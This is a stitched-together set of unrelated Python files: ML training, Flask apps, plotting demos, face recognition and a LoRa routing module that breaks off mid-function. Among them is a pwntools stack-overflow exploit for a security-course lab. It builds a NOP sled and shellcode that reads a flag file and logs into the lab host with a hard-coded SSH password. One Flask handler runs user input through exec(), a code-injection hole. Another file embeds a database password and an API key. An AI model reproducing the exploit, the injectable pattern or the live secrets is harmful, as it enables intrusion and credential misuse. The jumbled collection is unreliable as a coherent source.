raise ValueError('Incompatible class weights')
config['model'] = vals['config']['model']
config['convolayers'] = vals['config']['convolayers']
config['fulllayers'] = vals['config']['fulllayers']
config['cont'] = args.retrain
model = keras.models.load_model(config['savepath'] + args.retrain + '.h5')
elif args.resume is not None: # Network interrupted
client = MongoClient(mongoconnection.server)
db = client[mongoconnection.db]
db.authenticate(mongoconnection.user, password=mongoconnection.passwd)
col = db[mongoconnection.col]
vals = col.find_one({'_id': int(args.retrain)}, {'config': 1, 'acc': 1})
if vals is None:
raise ValueError('This experiment does not exist ' + args.resume)
else:
config = vals['config']
config['train']['epochs_trained'] = len(config['acc'])
model = keras.models.load_model(config['savepath'] + args.resume + '.h5')
resume = vals
else: # New model
model = simple_model(config)
train_model_batch(model, config, test, test_labels, resume=resume)
|
#!/usr/bin/env python3
class VBoxLibException(Exception):
def __init__(self, message):
super().__init__(message)
|
from flask import jsonify
from flask_restful import Resource, abort
from runner.data import db_session
from runner.data.command import Command
from runner.data.command_parser import command_parser, command_parser_not_required
def abort_if_not_found(command_id):
session = db_session.create_session()
command = session.query(Command).get(command_id)
if not command:
abort(404, message=f"Command {command_id} not found")
class CommandResource(Resource):
def get(self, command_id):
abort_if_not_found(command_id)
session = db_session.create_session()
command = session.query(Command).get(command_id)
return jsonify({'command': command.to_dict()})
def delete(self, command_id):
abort_if_not_found(command_id)
session = db_session.create_session()
command = session.query(Command).get(command_id)
session.delete(command)
session.commit()
return jsonify({'success': 'OK'})
def put(self, command_id):
abort_if_not_found(command_id)
args = command_parser_not_required.parse_args()
session = db_session.create_session()
command = session.query(Command).get(command_id)
for token in ('action_name', 'trigger', 'answer'):
if token in args and args[token] is not None:
exec(f"command.{token} = '{args[token]}'")
session.commit()
return jsonify({'success': 'OK'})
class CommandResourceMany(Resource):
def get(self, port):
session = db_session.create_session()
commands = session.query(Command).filter(Command.port == port).all()
return jsonify({"commands": [x.to_dict() for x in commands]})
class CommandListResource(Resource):
def post(self):
args = command_parser.parse_args()
session = db_session.create_session()
command = Command(
action_name=args['action_name'],
trigger=args['trigger'],
answer=args['answer'],
port=args['port']
)
session.add(command)
session.commit()
return jsonify({'success': 'OK'})
|
import asyncio
import signal
import gunicorn.workers.base as base
class GunicornWorker(base.Worker):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.exit_code = 0
def init_process(self):
asyncio.get_event_loop().close()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
super().init_process()
def run(self):
self._runner = asyncio.ensure_future(self._run(), loop=self.loop)
self.pulse = asyncio.ensure_future(self.heart_beat(), loop=self.loop)
self.loop.run_forever()
async def _run(self):
self.wsgi.run()
async def heart_beat(self):
while self.alive:
self.notify()
await asyncio.sleep(self.timeout)
def init_signals(self):
pass
|
from lexer import Lexer
from parser_pasc import Parser
# PAULO HENRIQUE DOS SANTOS - 11722528
# RAFAEL MOREIRA ALMEIDA - 11722680
if __name__ == "__main__":
lexer = Lexer('prog1.txt')
parser = Parser(lexer)
parser.prog()
parser.lexer.closeFile()
# token = lexer.proxToken() -> Os tokens estavam sendo chamados daqui
# print("\n")
# print("Tabela de simbolos:\n")
# lexer.printTS()
# lexer.closeFile()
# print('\nFim da compilacao\n')
|
# See file COPYING distributed with xnatrest for copyright and license.
from .exceptions import *
from .core import *
from .resources import *
# eof
|
"""zhinst-toolkit multistate node adaptions."""
import typing as t
import numpy as np
import zhinst.utils.shfqa.multistate as utils
from zhinst.toolkit.nodetree import Node, NodeTree
from zhinst.toolkit.nodetree.node import NodeList
from zhinst.toolkit.nodetree.helper import (
lazy_property,
create_or_append_set_transaction,
)
class Qudit(Node):
"""Single Qudit node.
Implements basic functionality of a single qudit node, e.g applying the
basic configuration.
Args:
root: Root of the nodetree.
tree: Tree (node path as tuple) of the current node.
serial: Serial of the device.
readout_channel: Index of the readout channel this qudit belongs to.
"""
def __init__(
self,
root: NodeTree,
tree: tuple,
serial: str,
readout_channel: int,
):
super().__init__(root, tree)
self._daq_server = root.connection
self._serial = serial
self._readout_channel = readout_channel
def configure(
self,
qudit_settings: utils.QuditSettings,
enable: bool = True,
) -> None:
"""Compiles a list of transactions to apply the qudit settings to the device.
Args:
qudit_settings: The qudit settings to be configured.
enable: Whether to enable the qudit. (default: True)
"""
settings = utils.get_settings_transaction(
self._serial,
self._readout_channel,
int(self._tree[-1]),
qudit_settings,
enable=enable,
)
with create_or_append_set_transaction(self._root):
for node, value in settings:
self._root.transaction.add(node, value)
class MultiState(Node):
"""MultiState node.
Implements basic functionality of the MultiState node.
Args:
root: Root of the nodetree.
tree: Tree (node path as tuple) of the current node.
serial: Serial of the device.
index: Index of the corresponding readout channel.
"""
def __init__(
self,
root: NodeTree,
tree: tuple,
serial: str,
index: int,
):
super().__init__(root, tree)
self._daq_server = root.connection
self._serial = serial
self._index = index
def get_qudits_results(self) -> t.Dict[int, np.ndarray]:
"""Downloads the qudit results from the device and group them by qudit.
This function accesses the multistate nodes to determine which
integrators were used for which qudit to able to group the results by
qudit.
Returns:
A dictionary with the qudit index keys and result vector values.
"""
return utils.get_qudits_results(
self._daq_server,
self._serial,
self._index,
)
@lazy_property
def qudits(self) -> t.Sequence[Qudit]:
"""A Sequence of Qudits."""
return NodeList(
[
Qudit(
self._root,
self._tree + ("qudits", str(i)),
self._serial,
self._index,
)
for i in range(len(self["qudits"]))
],
self._root,
self._tree + ("qudits",),
)
|
import matplotlib.pyplot as plt
import numpy as np
"""用于为了避免"""
x = np.linspace(-3, 3, 50)
y = 0.1 * x
plt.figure()
plt.plot(x, y, linewidth=10)
plt.ylim(-2, 2) # 设置y从-2到2
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
# 将下面的边框作为横坐标轴,左边边框作为竖坐标轴
ax.xaxis.set_ticks_position('bottom')
ax.spines['bottom'].set_position(('data', 0)) # 可以去掉看看效果
ax.yaxis.set_ticks_position('left')
ax.spines['left'].set_position(('data', 0)) # 可以去掉看看效果
# 获取图像中所有的label,并且设置图像中的label
for label in ax.get_xticklabels() + ax.get_yticklabels():
label.set_fontsize(12) # 设置字体大小为12
label.set_bbox(dict(facecolor='white', edgecolor='None', alpha=0.7))
# 设置label颜色是白色,edgecolor边框颜色无,透明度为0.7
plt.show() |
import re
class DoesntHeHaveInternElvesforThis:
def __init__(self):
with open("2015/5/input.txt", "r") as file:
self.strings = file.read().splitlines()
@staticmethod
def check_if_nice_one(string):
if re.findall(r"ab|cd|pq|xy", string): return True
if not re.findall(r"(\w)\1", string): return True
if not re.findall(r"[aeiou].*[aeiou].*[aeiou]", string): return True
return False
@staticmethod
def check_if_nice_two(string):
if not re.findall(r"(..).*\1", string): return True
if not re.findall(r"(.).\1", string): return True
return False
def count_nice_strings(self, check_for_nice_fn):
counter = 0
for string in self.strings:
if check_for_nice_fn(string): continue
counter += 1
return counter
if __name__ == "__main__":
task = DoesntHeHaveInternElvesforThis()
print('Solution to first part: {}'.format(
task.count_nice_strings(DoesntHeHaveInternElvesforThis.check_if_nice_one)
))
print('Solution to second part: {}'.format(
task.count_nice_strings(DoesntHeHaveInternElvesforThis.check_if_nice_two)
)) |
import os
from os import path
p = os.path.abspath('')
p1 = os.path.abspath('')
pl = os.path.abspath('')
p += r'\dbs\''
p1 += r'\''
pl += r'\logs\''
p = p[:-1]
p1 = p1[:-1]
pl = pl[:-1]
if path.exists("dbs") == 0:
os.mkdir("dbs")
if path.exists("logs") == 0:
os.mkdir("logs")
pmain = p + "db_main_info.txt"
pmainb = p + "db_main_info_backup.txt"
pused = p + "db_used_info.txt"
pusedb = p + "db_used_info_backup.txt"
pach = p + "db_achievements_info.txt"
pachb = p + "db_achievements_info_backup.txt"
if path.exists(pmain) == 0:
open(pmain, "w", encoding="utf8").close()
if path.exists(pmainb) == 0:
open(pmainb, "w", encoding="utf8").close()
if path.exists(pused) == 0:
open(pused, "w", encoding="utf8").close()
if path.exists(pusedb) == 0:
open(pusedb, "w", encoding="utf8").close()
if path.exists(pach) == 0:
open(pach, "w", encoding="utf8").close()
if path.exists(pachb) == 0:
open(pachb, "w", encoding="utf8").close()
if path.exists(".env") == 0:
f = open(p1 + ".env", "w", encoding="utf8")
f.write('BOT_TOKEN=\nADMIN_ID=\nMAIN_INFO='
+ pmain + '\nMAIN_INFO_BACKUP='
+ pmainb + '\nUSED_INFO='
+ pused + '\nUSED_INFO_BACKUP='
+ pusedb + '\nACHIEVEMENTS_INFO='
+ pach + '\nACHIEVEMENTS_INFO_BACKUP='
+ pachb + '\nLOGS_PATH=' + pl)
print('done!')
|
import os
import requests
from flask import Flask, session, render_template, url_for, request, redirect, flash
from flask_bcrypt import Bcrypt
from flask_session import Session
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
app = Flask(__name__)
# Check for environment variable
if not os.getenv("DATABASE_URL"):
raise RuntimeError("DATABASE_URL is not set")
# Configure session to use filesystem
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Set up database
database_url = """postgres://uyuytfcwssurku:09d77e0634269dfa5609c6f34051bf637009d0e6ef12b4efa883125ef1601afa@ec2-107-20-155-148.compute-1.amazonaws.com:5432/d3c28q6jpugsl"""
engine = create_engine(os.getenv('database_url'))
db = scoped_session(sessionmaker(bind=engine))
# for password hashing
bcrypt = Bcrypt(app)
# goodreads api key
api_key = 'pXU1aeUhm4RKk98xkH6tw'
loggedin_name = None
@app.route("/")
@app.route("/home", methods=['GET', 'POST'])
def home():
return render_template('home.html', title='Home', stylefile='homie.css', name=loggedin_name)
@app.route('/book', methods=['POST', 'GET'])
def book():
if request.method=='POST':
if not loggedin_name:
flash("You are not logged in.", category="warning")
return redirect(url_for('login'))
else:
form = request.form
query = form['search']
found_books = db.execute('SELECT * FROM books WHERE isbn=:query OR title=:query OR author=:query OR year=:query', {'query':query}).fetchall()
if found_books:
books_isbns = [book['isbn'] for book in found_books]
str_books_isbns = ",".join(books_isbns)
res = requests.get("https://www.goodreads.com/book/review_counts.json", params={'key':api_key, 'isbns':str_books_isbns})
res = res.json()
book_review=list()
for book in res['books']:
book_review.append((book['work_ratings_count'], book['average_rating']))
return render_template('book.html', title='Books Found', found_books=enumerate(found_books), name=loggedin_name, stylefile='bookee.css', book_review=book_review)
else:
flash('No books found!', category='warning')
return redirect(url_for('home'))
@app.route("/login", methods=['GET', 'POST'])
def login():
if request.method=='POST':
form = request.form
user_email = form['email']
user_password = form['password']
# check user authentication
user_exist = db.execute('SELECT email FROM users WHERE email=:useremail', {'useremail':user_email}).fetchone()
if user_exist:
matching_password = db.execute('SELECT password FROM users WHERE email=:useremail', {'useremail':user_email}).fetchone()
if bcrypt.check_password_hash(matching_password[0], user_password):
flash('Logged in successfully.', category='success')
user_name = db.execute('SELECT name FROM users WHERE email=:useremail', {'useremail':user_email}).fetchone()
# return render_template('home.html', title='Home', stylefile='homie.css', name=user_name[0])
global loggedin_name
loggedin_name=user_name[0]
print(loggedin_name)
return redirect(url_for('home'))
else:
flash('Incorrect password!', category='danger')
else:
flash('Invalid email! Please check or sign up.', category='danger')
return render_template('login.html', title='Log in', stylefile='logine.css')
@app.route("/signup", methods=['GET', 'POST'])
def signup():
if request.method=='POST':
form = request.form
user_name = form['name']
user_email = form['email']
user_password = form['password']
user_confirmpassword = form['confirmPassword']
hashed_password = bcrypt.generate_password_hash(user_password).decode('utf-8')
# check if email already exists
found_email = db.execute('SELECT * FROM users WHERE email = :useremail', {'useremail':user_email}).fetchone()
if found_email:
flash('Email already exists!', category="danger")
return render_template('signup.html', title='Sign up', stylefile='signupee.css')
elif user_confirmpassword != user_password:
flash('Passwords don\'t match', category="danger")
return render_template('signup.html', title='Sign up', stylefile='signupee.css')
else:
# add user data to database
db.execute('INSERT INTO users (name, email, password) VALUES (:username, :useremail, :userpassword)', {'username':user_name, 'useremail':user_email, 'userpassword':hashed_password})
db.commit()
flash('Account created successfully.', category='success')
return redirect(url_for('login'))
else:
return render_template('signup.html', title='Sign up', stylefile='signupee.css')
@app.route('/logout')
def logout():
global loggedin_name
loggedin_name=None
return redirect(url_for('home'))
|
from django.contrib import admin
from apply.models import Apply, Project, ProjectComment
# Register your models here.
admin.site.register(Apply)
admin.site.register(Project)
admin.site.register(ProjectComment) |
from typing import List, NamedTuple
from textblob import Word
MIN_CONFIDENCE = 0.5
class SuggestedWord(NamedTuple):
word: str
confidence: float
def get_spelling_suggestions(
word: str, min_confidence: float = MIN_CONFIDENCE
) -> List[SuggestedWord]:
"""
Find spelling suggestions with at least minimum confidence score
Use textblob.Word (check out the docs)
"""
suggestions = []
w = Word(word)
for s in w.spellcheck():
if s[1] >= min_confidence:
word = s[0]
confidence = s[1]
suggestions.append(SuggestedWord(word, confidence))
return suggestions
|
def tupla_par(tupla):
#Crio uma lista em branco para preencher com os valores da tupla
lista = []
#Criar um for para pecorrer todos os elementos da tupla
for i in range(0, len(tupla)):
#se a posição em que estu da tupla for par adiciono ao fim da lista o campo atual da tupla
if i%2==0:
lista.append(tupla[i])
#Ao final do for tranformo a lista em uma tupla associada ao rotulo t
t = tuple(lista)
#Retorno uma tupla
return t
#conteudo da tupla1 como no exemplo
tupla1 = ('oi', 'estou', 'estudando', 'poo')
#nova tupla com a tupla da função tulpa_par
tupla2 = (tupla_par(tupla1))
#printo na tela a nova tupla
print(tupla2)
|
import pytest
@pytest.fixture(params=[1,2,3])
def login(request):
print(request.param)
print("获取数据")
def test_case111(login):
print('\n'"执行测试用例111")
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 30 15:42:39 2019
@author: aakansha.dhawan
"""
import pickle
from PIL import Image
from numpy import asarray
from numpy import expand_dims
from mtcnn.mtcnn import MTCNN
from sklearn.preprocessing import LabelEncoder
from keras.models import load_model
out_encoder = LabelEncoder()
def extract_face(filename, required_size=(160, 160)):
# load image from file
image = Image.open(filename)
# convert to RGB, if needed
image = image.convert('RGB')
# convert to array
pixels = asarray(image)
# create the detector, using default weights
detector = MTCNN()
# detect faces in the image
results = detector.detect_faces(pixels)
# extract the bounding box from the first face
x1, y1, width, height = results[0]['box']
# bug fix
x1, y1 = abs(x1), abs(y1)
x2, y2 = x1 + width, y1 + height
# extract the face
face = pixels[y1:y2, x1:x2]
# resize pixels to the model size
image = Image.fromarray(face)
image = image.resize(required_size)
face_array = asarray(image)
#image.show()
return face_array
def get_embedding(model, face_pixels):
# scale pixel values
face_pixels = face_pixels.astype('float32')
# standardize pixel values across channels (global)
mean, std = face_pixels.mean(), face_pixels.std()
face_pixels = (face_pixels - mean) / std
print(face_pixels.shape)
# transform face into one sample
samples = expand_dims(face_pixels, axis=0)
print(samples.shape)
# make prediction to get embedding
yhat = model.predict(samples)
return yhat[0]
def predict(image):
filename = 'finalized_model.sav'
model_svm = pickle.load(open(filename, 'rb'))
image="test2.jpg"
extracted_face=extract_face(image)
model = load_model('facenet_keras.h5')
face_emmbed = get_embedding(model, extracted_face)
face_emmbed = asarray(face_emmbed)
face_emmbed = expand_dims(face_emmbed, axis=0)
yhat_class = model_svm.predict(face_emmbed)
yhat_prob = model_svm.predict_proba(face_emmbed)
class_index = yhat_class[0]
class_probability = yhat_prob[0,class_index] * 100
if yhat_class[0]==0 :
name="aakansha_dhawan"
if yhat_class[0]==1 :
name="ben_afflek"
if yhat_class[0]==2 :
name="elton_john"
if yhat_class[0]==3 :
name="jerry_seinfeld"
if yhat_class[0]==4 :
name="madonna"
if yhat_class[0]==5 :
name="mindy_kaling"
return name,class_probability |
#!/usr/bin/env python2
from pwn import *
exe = "./target"
mydir = "jmp-to-stack"
path = "/home/lab03/" + mydir
context.terminal = ['tmux', 'splitw', '-v']
context.update(arch='i386', os='linux')
env = {"SHELLCODE": "\x90"*0x1000 + asm(pwnlib.shellcraft.i386.linux.cat("/proc/flag"))}
#env = {"SHELLCODE": asm(pwnlib.shellcraft.i386.linux.sh())}
padding = 0x63616171
nop_offset = 1000
# Address to use
# Got this address by forcing a segfault, using the telescope command to
# examine the stack, then examining the stack with x/20wx
local_addr_invoke = 0xffffcf74
local_addr_gdb = 0xffffc124
server_start_invoke = 0xffffd12c
server_start_gdb = 0xffffc998
start_addr = server_start_gdb
start_addr = start_addr + (nop_offset/2)
# NOP sled
nop_sled = "\x90" * nop_offset
shellcode = shellcraft.cat("/proc/flag")
# start constructing payload
payload = cyclic(cyclic_find(padding))
payload += p32(start_addr)
payload += nop_sled
payload += asm(shellcode)
payload += nop_sled
# Address sled
for i in range (0, 200):
payload += p32(start_addr)
f = open('shellcode', 'w')
f.write(payload)
f.close()
s = ssh("lab03", "52.201.10.159", password="b50e289f")
p = s.process(["./target", payload], cwd="/home/lab03/jmp-to-stack")
#p = process(["./target", payload], cwd="/home/jakeholl/git/cs6265/lab03/jmp-to-stack")
p.interactive()
|
import os.path as osp
from dea_ml.config.config_parser import parse_config
from dea_ml.config.product_feature_config import FeaturePathConfig
def test_parse_config():
cwd = osp.dirname(__file__)
dummy_config = parse_config(osp.join(cwd, "default.config"))
should_be = FeaturePathConfig()
assert dummy_config == should_be
|
'''**************************************************************************
File: cargo.py
Language: Python 3.6.8
Author: Juliette Zerick (jzerick@iu.edu)
for the WildfireDLN Project
OPeN Networks Lab at Indiana University-Bloomington
In this file the class cargo_hold manages transient data, that is, data that
is not committed to the UNIS Runtime. Data gradually streams in to be passed
on to other devices, or to create routing tables. By observing local flow
of LoRa messages this device can estimate the position of neighbors,
which neighbors it needs to receive messages from elsewhere in the swarm,
and which neighbors similarly need it.
Last modified: October 7, 2019
****************************************************************************'''
import pandas as pd
import threading
from protocol import *
import bridge
LAST_OBS_VAR_NAME = 'last_obs_time'
class cargo_hold:
def __init__(self,my_name,my_dev_id,my_lora_id,vessel_transmit_f):
self.name = my_name
self.my_dev_id = my_dev_id
self.my_lora_id = my_lora_id
self.vessel_transmit_f = vessel_transmit_f
# warning: pandas is not thread safe (v0.11 onward)
self.data_lock = threading.Lock()
self.rtg_lock = threading.Lock()
self.df = self.gen_init_df()
# searching for devices observed thus far and other operations can
# of course be performed using operations on the DataFrame, but these
# redundant data structures reduce computational load. what is elegant
# code on a cluster is torture for a small device.
self.devices_seen = set()
self.who_I_need = set() # probably grammatically incorrect
self.who_needs_me = set() # it's quiet...
self.who_does_not_need_me = set() # beleaguered English teachers
self.who_needs_whom = set() # must be sleeping
self.who_does_not_need_whom = set()
def gen_init_df(self):
df = pd.DataFrame(columns=PROTOCOL_COLUMNS.keys())
df.set_index('receipt_ts',inplace=True)
return df
def append_batch(self,last_batch):
if len(last_batch) == 0: return # nothing to do
df0 = pd.concat([self.df] + last_batch,sort=True) # note: sorting requires pandas 0.23.0+
self.data_lock.acquire()
self.df = df0
self.data_lock.release()
#self.in_the_weeds('%d new records added to df, now %d' % (len(last_batch),len(self.df)))
def in_the_weeds(self,S):
if IN_THE_WEEDS:
print(self.add_name(' :: '+translate_text(S)))
def save_run_results(self):
df = translate_df(self.df)
#fn = datetime_now()+self.name+'.csv'
fn = self.name+'.csv'
df.to_csv(fn,sep=DF_DELIM)
def dump_sets(self):
print(self.name,'dev seen',self.devices_seen)
print(self.name,'who I need',self.who_I_need)
print(self.name,'who needs me',self.who_needs_me)
print(self.name,'whod does not need me',self.who_does_not_need_me)
print(self.name,'who needs whom',self.who_needs_whom)
print(self.name,'who does not need whom',self.who_does_not_need_whom)
print(bridge.dev_id2name_mapping)
def seen_msg(self,lmsg):
skey = lmsg.skey
all_skeys = set(self.df['skey'])
return skey in all_skeys
def update_table_entry(self,idx,col_name,val): # keep for reference!
if bridge.closing_time: return # avoid threading errors during shutdown
if idx not in self.df.index or col_name not in self.df.columns: return
# no checks for pre-existing data
if not bridge.closing_time:
self.data_lock.acquire()
'''
A reminder:
self.df[var_name][dev_id] = val
produces the pandas warning SettingWithCopyWarning, when
'A value is trying to be set on a copy of a slice from a DataFrame'
The way to set the value without unintentionally slicing and creating
a duplicate DataFrame that is then modified (leaving the original
untouched) is with .loc, as follows:
'''
try:
self.df.loc[idx,col_name] = val
except IndexError:
log.error('failure! saving progress to file for analysis')
self.df.to_csv('update-failure-%s-%s-%s.csv' % (idx,col_name,val))
bridge.closing_time = True
mopup()
self.data_lock.release()
def gleaner_update(self):
#self.in_the_weeds('gleaner updating')
self.update_devices_seen()
self.update_who_I_need()
self.update_who_needs_me()
self.update_who_needs_whom()
#self.in_the_weeds('gleaner update complete')
def update_ferry_loc(self,dev_id,gps_lat,gps_long,obs_time):
n = register_or_retrieve_node(dev_id)
# does the node have a timestamp of the last observation of its location?
if node_has_var(n,'location.last_obs'):
# if we already have a more recent (presumably better) estimate, do nothing
if obs_time < n.location.last_obs_time:
return
# otherwise update. note that attempting update_var(n,'location.latitude',gps_lat)
# produces errors, so do this one manually
n.location.longitude = gps_long
n.location.latitude = gps_lat
n.location.last_obs_time = obs_time
bridge.rt.flush()
def update_devices_seen(self):
dev_seen = set(self.df['sender_dev_id']) \
| set(self.df['relayer_dev_id']) - set(['',MULTICAST])
self.data_lock.acquire()
self.devices_seen = dev_seen
self.data_lock.release()
if bridge.HAVE_UNIS:
for d in self.devices_seen:
# do we have data?
(gps_lat,gps_long,obs_time) = self.estimate_loc(d,now())
if DATA_NOT_FOUND not in [gps_lat,gps_long,obs_time]:
self.update_ferry_loc(d,gps_lat,gps_long,obs_time)
# if not, do nothing. wait until the next check to try updating.
def who_has_promoted(self,skey):
# no errors thrown if no record exists with the skey given
return set(self.df[self.df['skey'] == skey]['sender_addr']) - set(['',MULTICAST])
def has_promoted(self,skey,dev_id):
return dev_id in self.who_has_promoted(skey)
def who_has_responded(self,skey):
# no errors thrown if no record exists with the skey given
rdf = self.df[self.df['ref_skey'] == skey]
return set(rdf[rdf['bloom_count'] > 0]['init_sender_addr']) \
| set(rdf[rdf['bloom_count'] == 0]['sender_addr'])- set(['',MULTICAST])
def has_responded(self,skey,dev_id):
return dev_id in self.who_has_responded(skey)
def get_response_dataset_from_query(self,query_skey):
# no errors thrown if no record exists with the skey given
rdf = self.df[self.df['ref_skey'] == query_skey]
if len(rdf) == 0: return set()
sample = rdf.head(1)
def do_I_need(self,dev_id):
return dev_id in self.who_I_need
def does_dev_need_me(self,dev_id):
return dev_id in self.who_needs_me
def update_who_I_need(self):
# do not convert to sets. we need the full, ordered DataFrame columns.
Senders = list(self.df['sender_dev_id'])
Relayers = list(self.df['relayer_dev_id'])
win = {}
# the number of Relayers is not necessary less than the number of Senders
if len(Senders) == 0 or len(Relayers) == 0: return
# as saturation progresses, we hear more amplifications.
# so use the most recent. hopefully it's not far out, close to the edge.
for i in range(len(self.df)):
sender = Senders[i]
relayer = Relayers[i]
if sender == self.my_dev_id or relayer == self.my_dev_id: continue
if relayer not in win:
win[relayer] = set()
win[relayer].add(sender)
# repackaging for sorting
win_t = []
for relayer in win:
win_t.append([len(win[relayer]),relayer,win[relayer]])
# the big fish eat the smaller fishes
if len(win_t) > 1:
win_t.sort()
for i in reversed(range(1,len(win_t),1)): # big fish here
ti = win_t[i][2]
# have we devoured all that came before?
if max(map(lambda x: len(x[2]),win_t[:i])) == 0:
break
for j in range(i): # small fish here
tj = win_t[j][2]
if len(tj) > 0:
if ti | tj == ti: # feeding time
win_t[j][2] = set() # will be filtered out shortly
self.in_the_weeds('tj (%s) ate ti (%s)' % (win_t[i][1],win_t[j][1]))
if len(win_t) > 0:
win_d = {}
for w in win_t:
win_d[w[1]] = set(w[2])
self.data_lock.acquire()
self.who_I_need = win_d
self.data_lock.release()
# update the approprite columns
for dev_id in win_d:
self.announce_dep(dev_id)
def announce_dep(self,recipient):
if recipient == self.my_dev_id: return
sender = self.my_dev_id
send_time = now()
msg_type = MSG_TYPE_RTG
if recipient in self.who_I_need:
payload = len(self.who_I_need[recipient])
else:
payload = 0
pkt = '%s/0/%s/%f/%d/%d//%f|' % (recipient,sender,send_time,
msg_type,payload,FAKE_RSSI_VALUE)
lmsg = lora_message(pkt)
if not lmsg.pkt_valid:
#log.packet_errors(self.add_name('says dependency announcement packet is invalid!'))
return
#log.data_flow(self.add_name('put the announcement packet to %s in queue' % (recipient)))
self.vessel_transmit_f(lmsg)
return lmsg
def get_rtg_results(self,needs_df):
# get records from the last hour only i.e. the last 3600 seconds
cutoff = now() - 3600
df_last_hour = needs_df[needs_df['send_time'] > cutoff]
# restrict further to routing messages only
df_rtg = df_last_hour[df_last_hour['msg_type'] == MSG_TYPE_RTG]
# and only take the most recent message
all_recip = set(df_rtg['recipient_addr'])- set(['',MULTICAST])
selected_records = []
# a walk down memory lane
for recip_dev in all_recip:
recip_rec = df_rtg[df_rtg['recipient_addr'] == recip_dev]
Senders = set(recip_rec['sender_addr'])- set(['',MULTICAST])
for sender in Senders:
# beware the SettingWithCopyWarning
recip_sender_rec = recip_rec[recip_rec['sender_addr'] == sender].copy(deep=True)
recip_sender_rec.sort_values(by='send_time',ascending=False,inplace=True)
most_recent_rec = recip_sender_rec.head(1)
selected_records.append(most_recent_rec)
if len(selected_records) == 0:
edf = empty_df(needs_df)
return set(),set(),set(),edf,edf
sel_df = pd.concat(selected_records,sort=True) # note: sorting requires pandas 0.23.0+
# split by classification
dep_df = sel_df[sel_df['dependency_count'] > 0]
indep_df = sel_df[sel_df['dependency_count'] == 0]
# extract
dependents = set(dep_df['sender_addr'])- set(['',MULTICAST])
independents = set(indep_df['sender_addr'])- set(['',MULTICAST])
ambivalents = self.devices_seen - dependents - independents
return dependents, independents, ambivalents, dep_df, indep_df
def update_who_needs_me(self):
# only determining my needs
needs_df = self.df[self.df['recipient_addr'] == self.my_dev_id]
# restrict to recent, unique entries only
deps, indeps, ambs, dep_df, indep_df = self.get_rtg_results(needs_df)
deps = set(dep_df['sender_addr'])- set(['',MULTICAST])
indeps = set(indep_df['sender_addr'])- set(['',MULTICAST])
ambs = self.devices_seen - deps - indeps
self.data_lock.acquire()
self.who_needs_me = deps
self.who_does_not_need_me = indeps
self.data_lock.release()
def update_who_needs_whom(self):
# only determining others' needs
needs_df = self.df[self.df['recipient_addr'] != self.my_dev_id]
# restrict to recent, unique entries only
deps, indeps, ambs, dep_df, indep_df = self.get_rtg_results(needs_df)
dep_d = {}
for this_dev_id in deps:
this_dev_dep_df = dep_df[dep_df['recipient_addr'] == this_dev_id]
this_dev_dep = set(this_dev_dep_df['sender_addr'])- set(['',MULTICAST])
dep_d[this_dev_id] = this_dev_dep
indep_d = {}
for this_dev_id in indeps:
this_dev_indep_df = indep_df[indep_df['recipient_addr'] == this_dev_id]
this_dev_indep = set(this_dev_indep_df['sender_addr'])- set(['',MULTICAST])
indep_d[this_dev_id] = this_dev_indep
self.data_lock.acquire()
self.who_needs_whom = dep_d
self.who_does_not_need_whom = indep_d
self.data_lock.release()
def x_needs_y(self,dev_x,dev_y):
# do we have the data?
if dev_y in self.who_needs_whom:
# is dev_x a dependent of dev_y?
if dev_x in self.who_needs_whom[dev_y]:
return True
return False
def x_indep_y(self,dev_x,dev_y):
# do we have the data?
if dev_y in self.who_does_not_need_whom:
# is dev_x independent of dev_y?
if dev_x in self.who_does_not_need_whom[dev_y]:
return True
return False
def are_dependent(self,dev_x,dev_y):
return self.x_needs_y(dev_x,dev_y) or self.x_needs_y(dev_y,dev_x)
def are_independent(self,dev_x,dev_y):
return self.x_indep_y(dev_x,dev_y) and self.x_indep_y(dev_y,dev_x)
def last_var_obs(self,var_name,msg_stack):
if var_name == 'obs_gps_lat':
data0 = msg_stack[msg_stack['obs_gps_lat'] != '']
elif var_name == 'obs_gps_long':
data0 = msg_stack[msg_stack['obs_gps_long'] != '']
else:
data0 = msg_stack[msg_stack['obs_var_name'] == var_name]
# return the empty DataFrame
if len(data0) == 0: data0
# beware the SettingWithCopyWarning
data = data0.copy(deep=True)
data.sort_values(by='send_time',ascending=False,inplace=True)
last_obs = data.head(1)
return last_obs
def retrieve_last_var_obs(self,dev_id,var_name):
msg_stack = self.df[self.df['obs_dev_id'] == dev_id]
if len(msg_stack) == 0: return msg_stack
last_obs = self.last_var_obs(var_name,msg_stack)
return last_obs
def retrieve_var_from_df(self,dev_id,var_name):
last_obs = self.retrieve_last_var_obs(dev_id,var_name)
if len(last_obs) == 0: return DATA_NOT_FOUND,DATA_NOT_FOUND
if var_name == 'obs_gps_lat':
retval = last_obs['obs_gps_lat'].values[0]
elif var_name == 'obs_gps_long':
retval = last_obs['obs_gps_long'].values[0]
else:
retval = last_obs['obs_val'].values[0]
return last_obs['obs_time'].values[0], retval
def estimate_loc(self,dev_id,obs_time):
# isolate data pertaining to this device
this_dev_df = self.df[self.df['obs_dev_id'] == dev_id]
# make a copy to ensure nothing is changed in the main DataFrame
this_dev_loc = this_dev_df[this_dev_df['obs_gps_lat'] != ''].copy(deep=True)
if len(this_dev_loc) == 0: return (DATA_NOT_FOUND,DATA_NOT_FOUND, DATA_NOT_FOUND)
# compute differences. find an observation of location as close
# to obs_time as possible.
this_dev_loc['diff'] = abs(this_dev_loc['obs_time'] - obs_time)
min_time_diff = min(list(this_dev_loc['diff']))
row = this_dev_loc[this_dev_loc['diff'] == min_time_diff].head(1)
gps_lat = row['obs_gps_lat'].values[0]
gps_long = row['obs_gps_long'].values[0]
obs_time = row['obs_time'].values[0]
# send back default values in the DataFrame
if DATA_NOT_FOUND in [gps_lat, gps_long, obs_time]:
return (DATA_NOT_FOUND, DATA_NOT_FOUND, DATA_NOT_FOUND)
return (gps_lat,gps_long,obs_time)
def best_estimate_dataset(self):
est_d = {}
all_vars = set(self.df['obs_var_name']) - set(['',DATA_NOT_FOUND])
for var_name in all_vars:
per_var = []
for dev_id in self.devices_seen | set([self.my_dev_id]):
obs_time, obs_val = self.retrieve_var_from_df(dev_id,var_name)
if DATA_NOT_FOUND in [obs_time,obs_val]: continue
